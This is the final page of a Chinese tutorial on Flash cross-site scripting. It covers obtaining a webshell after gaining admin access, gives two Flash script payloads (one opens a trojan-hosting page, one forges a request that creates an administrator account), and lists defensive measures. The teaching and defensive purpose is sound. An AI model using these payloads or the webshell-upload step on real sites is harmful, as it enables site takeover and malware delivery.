WEB开发网
开发学院网络安全安全技术 解析Flash跨站脚本攻击 阅读

解析Flash跨站脚本攻击

 2008-01-09 13:12:26 来源:WEB开发网   
核心提示: 图54.得到webshell通过后台修改上传文件的类型,或者通过备份数据,解析Flash跨站脚本攻击(4),上传一个网马,(图6)图6如果服务器设置不当或者应用程序有漏洞不需要太费尽,突破了用户这道防线,任何安全措施都失去了作用,这台服务器就可以拿下,如果是虚拟主机的话

图5

4.得到webshell

通过后台修改上传文件的类型,或者通过备份数据,上传一个网马。(图6)

解析Flash跨站脚本攻击

图6

如果服务器设置不当或者应用程序有漏洞不需要太费尽,这台服务器就可以拿下,如果是虚拟主机的话,那有多少网站都被控制。我们的渗透到此为止。

以上的Flash跨站攻击测试只是其最常规的用法,其使用可谓博大精深,比如说将指令改为

  getURP("javascript:window.open('http://192.168.0.5/flash/wm.html')");

打开了一个挂马的网站。

  getURP("javascript:window.open('http://www.xxx.com/addadmin.asp?username=lw')");

提交了一个名为lw的管理员。

总结:我们通过虚拟的环境演示了Flash跨站攻击,通过准备、获取信息、利用信息,一直到得到管理员密码,进入后台,获得webshell,直至拿下服务器,可见Flash跨站攻击的危害之大。那如何防范这样的攻击呢?

四、预防Flash跨站攻击

1.在你的WEB浏览器上禁用javascript脚本,具体方法,先打开你的IE的internet选项,切换到“安全”选项卡,有个“自定义”级别,选择禁用就可以了。但是好象不太可能,因为一旦禁用,很多功能就丧失了,这个方法是下策。

2.开发者要仔细审核代码,对提交输入的数据进行有效检查,如空格,ascii码等,这个是上策。但是由于XSS漏洞可被利用的多样性,程序员自己要明白具体需要过滤的字符,这主要依赖于所开发程序的作用,建议过滤掉所有元字符。

3.登录论坛,选择不保存cookies,可预防cookies欺骗。(图7)

解析Flash跨站脚本攻击

图7

4.用可以屏蔽flash广告的浏览器,或者安装相关的插件。

5.不打开带有诱惑性的帖子。

6.管理员在后台屏蔽相关的词汇。

7.安装微软防跨站脚本库

下载地址:

http://www.microsoft.com/downloads/details.aspx?FamilyID=efb9c819-53ff-4f82-bfaf-e11625130c25&DisplayLang=en

总结:Flash跨站攻击手段多样,要有效预防是比较困难的,提高自身的安全意识才是关键。其实网络中的攻击除了技术之外,利用最多的就是使用者的疏忽大意,突破了用户这道防线,任何安全措施都失去了作用,这就是网络安全中的“木桶原理”吧。

上一页  1 2 3 4 

Tags:解析 Flash 脚本

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接